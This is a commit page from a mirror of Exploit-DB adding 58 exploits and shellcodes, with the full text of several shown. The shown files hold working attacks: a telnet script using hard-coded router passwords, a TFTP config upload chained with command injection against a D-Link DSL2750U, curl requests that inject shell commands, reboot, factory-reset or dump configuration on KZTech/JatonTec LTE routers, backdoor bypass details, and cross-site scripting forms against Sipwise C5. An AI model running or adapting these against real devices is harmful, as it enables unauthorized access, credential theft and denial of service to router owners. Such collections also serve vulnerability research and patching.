bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-29

Browse source 
58 changes to exploits/shellcodes

Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial of Service (PoC)
Easy CD & DVD Cover Creator 4.13 - Denial of Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
ProFTPD 1.3.7a - Remote Denial of Service
glFTPd 2.11a - Remote Denial of Service
Hasura GraphQL 1.3.3 - Denial of Service
Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)
NBMonitor 1.6.8 - Denial of Service (PoC)
Nsauditor 3.2.3 - Denial of Service (PoC)
Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC)
Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
Post-it 5.0.1 - Denial of Service (PoC)
Notex the best notes 6.4 - Denial of Service (PoC)
SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)
Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)
GeoGebra Graphing Calculato‪r‬ 6.0.631.0 - Denial Of Service (PoC)
GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)
GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)
Backup Key Recovery 2.2.7 - Denial of Service (PoC)
memono Notepad Version 4.2 - Denial of Service (PoC)

Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path

Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
vsftpd 3.0.3 - Remote Denial of Service

Dlink DSL2750U - 'Reboot' Command Injection

PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)

Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)

Arteco Web Client DVR/NVR - 'SessionId' Brute Force

Resumes Management and Job Application Website 1.0 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
'customhs_js_content' - 'customhs_js_content' Cross-Site Request Forgery
Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting

rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)

Mini Mouse 9.3.0 - Local File inclusion

rconfig 3.9.6 - Arbitrary File Upload

Sipwise C5 NGCP CSC - 'Multiple' Persistent Cross-Site Scripting (XSS)

Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

OpenEMR 5.0.1.3 - Authentication Bypass
VMware vCenter Server 7.0 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Supsystic Contact Form 1.7.18 - 'label' Stored Cross-Site Scripting (XSS)

Patient Appointment Scheduler System 1.0 - Persistent Cross-Site Scripting

Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection
Budget and Expense Tracker System 1.0 - Authenticated Bypass
Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF)

WordPress Plugin Select All Categories and Taxonomies 1.3.1 - Reflected Cross-Site Scripting (XSS)

Blood Bank System 1.0 - Authentication Bypass

Lodging Reservation Management System 1.0 - Authentication Bypass

Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read

Linux/x64 - /sbin/halt -p Shellcode (51 bytes)
Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)
Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes_ xor encoded)

Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
This commit is contained in:
Offensive Security 2021-10-29 05:02:12 +00:00
parent e8bb2eb69f
commit f33a724e0b
60 changed files with 4353 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

68
exploits/hardware/dos/49685.txt Normal file
View file

@ -0,0 +1,68 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device allows unauthenticated attackers to restart the
device with an HTTP GET request to /goform/RestartDevice page.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5643
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php
03.02.2021
--
$ curl -sk https://192.168.1.1/goform/RestartDevice
success
$

92
exploits/hardware/remote/49682.txt Normal file
View file

@ -0,0 +1,92 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials are never exposed to
the end-user and cannot be changed through any normal operation of
the router.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5637
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php
03.02.2021
--
Default web creds:
------------------
admin:admin123
user:user123
Telnet/SSH access:
------------------
admin:root123
===
import telnetlib
host="192.168.1.1"
user="admin"
password="root123"
s=telnetlib.Telnet(host)
s.read_until(b"CPE login: ")
s.write(user.encode('ascii') + b"\n")
s.read_until(b"Password: ")
s.write(password.encode('ascii') + b"\n")
s.write(b"busybox\n")
print(s.read_all().decode('ascii'))
s.mt_interact()
s.close()

109
exploits/hardware/remote/50034.txt Normal file
View file

@ -0,0 +1,109 @@
# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection
# Date: 17-06-2021
# Exploit Author: Mohammed Hadi (HadiMed)
# Vendor Homepage: https://me.dlink.com/consumer
# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16
# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R*
# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6)
###
#!/bin/bash
# Exploit by HadiMed
# Takes advantage of the tftp server that accepts the cfg file blindly
echo -ne "\n"
echo "Exploiting Dlink DSL-2750u version 1.6"
echo -ne "\n\n"
# Sending the payload
echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1
echo -ne "\n"
echo "File uploaded Successfully"
echo "Waiting for router to restart"
sleep 180 # approximate time for router to restart
python3 exploit.py
###
import requests
# HTTP request looks like this
'''
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.1.1
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.1/cgi-bin/webproc
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91
Connection: close
getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91
'''
# 1 Getting a session id
# password and username crafted by me on the cfg.xml file
username = "pwned"
password= "pwned"
# acually the client set the sessionid in condition that the password and username are correct
Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef"
Contentty="application/x-www-form-urlencoded"
Referer="http://192.168.1.1/cgi-bin/webproc"
Contentlen="175"
# Sending first request to set our session id
response = requests.post("http://192.168.1.1/cgi-bin/webproc",
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
,
data={ "getpage":"html/index.html",
"errorpage":"html/main.html",
"var:menu" : "setup",
"var:page":"wizard",
"obj-action":"auth",
":username":username,
":password":password,
":action":"login",
":sessionid":"deadbeef"
}
)
Referer = "http://192.168.1.1/cgi-bin/webupg"
name = "mac"
cmd = "1;sleep${IFS}10;reboot;"
Contentlen = str(len(name+cmd)+10)
if response.status_code==302:
print("got sessionid=deadbeef !\n waiting for the reverse shell ...")
# access cgi-bin/webupg
try :
response = requests.post("http://192.168.1.1/cgi-bin/webupg",
headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen }
,data = {"name":name , "newmac":cmd} , timeout=0.0000000001
)
except requests.exceptions.Timeout :
print("done router will restart in 20 sec")
print("Device restarted!")

83
exploits/hardware/webapps/49680.txt Normal file
View file

@ -0,0 +1,83 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The application suffers from an authenticated OS command
injection vulnerability. This can be exploited to inject and
execute arbitrary shell commands through the 'pingAddr' HTTP
POST parameter bypassing the injection protection filter.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5635
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php
03.02.2021
--
#JT3300V/AM3300V
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
-H "Cookie: kz_userid=admin:311139" \
-H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$
#JT3500V
lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \
--data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \
-H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \
-H "X-Requested-With: XMLHttpRequest"
ping: bad address 'Linux'
lqwrm@metalgear:~/prive$

89
exploits/hardware/webapps/49681.txt Normal file
View file

@ -0,0 +1,89 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The application suffers from an authentication bypass
vulnerability. An unauthenticated attacker can disclose sensitive
and clear-text information resulting in authentication bypass by
downloading the configuration of the device and revealing the
admin password.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5636
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php
03.02.2021
--
$ curl -s \
-o configtest.zlib \ # Default: config.dat
'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \
binwalk -e configtest.zlib ; \
cd _configtest.zlib_extracted ; \
strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \
# cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device
cd ..
3:Login=admin
4:Password=neotelwings
5:TelnetPwd=root123
6:GuestId=user
7:GuestPassword=user123
89:DDNSPassword=
239:auto_update_password=
279:Tr069_Password=
288:Tr069_ConnectionRequestPassword=admin
300:Tr069_STUNPassword=
339:telnetManagement=2
$

124
exploits/hardware/webapps/49683.txt Normal file
View file

@ -0,0 +1,124 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device has several backdoors and hidden pages that
allow remote code execution, overwriting of the bootrom and
enabling debug mode.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5639
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php
03.02.2021
--
Older and newer models defer in backdoor code.
By navigating to /syscmd.html or /syscmd.asp pages
an attacker can authenticate and execute system
commands with highest privileges.
Old models (syscmd.asp) password: super1234
Newer models (syscmd.html) password: md5(WAN_MAC+version):
$ curl -k https://192.168.1.1/goform/getImgVersionInfo
{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]}
...
pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR");
if (*pcVar6 == 0) {
pcVar6 = "6C:AD:EF:00:00:01";
}
memset(acStack280,0,0x100);
sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210");
...
psMd5Init(auStack112);
psMd5Update(auStack112,local_10,local_c);
psMd5Final(auStack112,uParm1);
return;
...
Another 2 backdoors exist using the websCheckCookie() and specific header strings.
...
iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb);
if (iVar2 != 0) {
return 0xffffffff;
}
if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) &&
(iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) {
return 0xffffffff;
...
if (iVar1 != 0) goto LAB_0047c304;
LAB_0047c32c:
WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1);
LAB_0047c35c:
__n = strlen(__s1);
if (__n == 0) {
snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log");
WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560);
system(acStack1560);
websWrite(iParm1,"invalid command!");
goto LAB_0047c3f8;
}
...
Bypass the backdoor password request and enable debug mode from within the web console:
$('#div_check').modal('hide'); <--- syscmd.html
g_password_check_alert.close(); <--- syscmd.asp

72
exploits/hardware/webapps/49684.txt Normal file
View file

@ -0,0 +1,72 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: The device allows unauthenticated attackers to visit the
unprotected /goform/LoadDefaultSettings endpoint and reset the
device to its factory default settings. Once the GET request is
made, the device will reboot with its default settings allowing
the attacker to bypass authentication and take full control of
the system.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5642
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php
03.02.2021
--
$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings
success
$

70
exploits/hardware/webapps/49686.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated)
# Date: 03.02.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk
http://www.jatontec.com/products/show.php?itemid=258
http://www.jatontech.com/CAT12.html#_pp=105_564
http://www.kzbtech.com/AM3300V.html
https://neotel.mk/ostanati-paketi-2/
Affected version: Model | Firmware
-------|---------
JT3500V | 2.0.1B1064
JT3300V | 2.0.1B1047
AM6200M | 2.0.0B3210
AM6000N | 2.0.0B3042
AM5000W | 2.0.0B3037
AM4200M | 2.0.0B2996
AM4100V | 2.0.0B2988
AM3500MW | 2.0.0B1092
AM3410V | 2.0.0B1085
AM3300V | 2.0.0B1060
AM3100E | 2.0.0B981
AM3100V | 2.0.0B946
AM3000M | 2.0.0B21
KZ7621U | 2.0.0B14
KZ3220M | 2.0.0B04
KZ3120R | 2.0.0B01
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi
& VoIP CPE product specially designed to enable quick and easy
LTE fixed data service deployment for residential and SOHO customers.
It provides high speed LAN, Wi-Fi and VoIP integrated services
to end users who need both bandwidth and multi-media data service
in residential homes or enterprises. The device has 2 Gigabit LAN
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing
and firewall software for security. It provides an effective
all-in-one solution to SOHO or residential customers. It can
deliver up to 1Gbps max data throughput which can be very
competitive to wired broadband access service.
Desc: JT3500V is vulnerable to unauthenticated configuration disclosure
when direct object reference is made to the export_settings.cgi file
using an HTTP GET request. This will enable the attacker to disclose
sensitive information and help her in authentication bypass, privilege
escalation and full system access.
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN
Linux 2.6.36+ (mips)
Mediatek APSoC SDK v4.3.1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5644
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php
03.02.2021
--
$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat
8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat

112
exploits/hardware/webapps/49800.html Normal file
View file

@ -0,0 +1,112 @@
# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS)
# Date: 13.04.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.sipwise.com
Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities
Vendor: Sipwise GmbH
Product web page: https://www.sipwise.com
Affected version: <=CE_m39.3.1
NGCP www_admin version 3.6.7
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,
conferencing etc.) that can be configured by end users in the self-care web interface.
For operators, it offers a web-based administrative panel that allows them to configure
subscribers, SIP peerings, billing profiles, and other entities. The administrative web
panel also shows the real-time statistics for the whole system. For tight integration
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.
Desc: Sipwise software platform suffers from multiple authenticated stored and reflected
cross-site scripting vulnerabilities when input passed via several parameters to several
scripts is not properly sanitized before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in context of an
affected site.
Tested on: Apache/2.2.22 (Debian)
Apache/2.2.16 (Debian)
nginx
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5648
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php
13.04.2021
--
Stored XSS (POST tsetname):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/callforward/time/set/save" method="POST">
<input type="hidden" name="tsetname" value=""><script>confirm&#40;251&#41;<&#47;script>" />
<input type="hidden" name="subscriber&#95;id" value="401" />
<input type="hidden" name="x" value="90027" />
<input type="hidden" name="y" value="&#45;1" />
<input type="submit" value="Go for callforward" />
</form>
</body>
</html>
Reflected XSS (GET filter):
---------------------------
<html>
<body>
<form action="https://10.0.1.7/addressbook" method="GET">
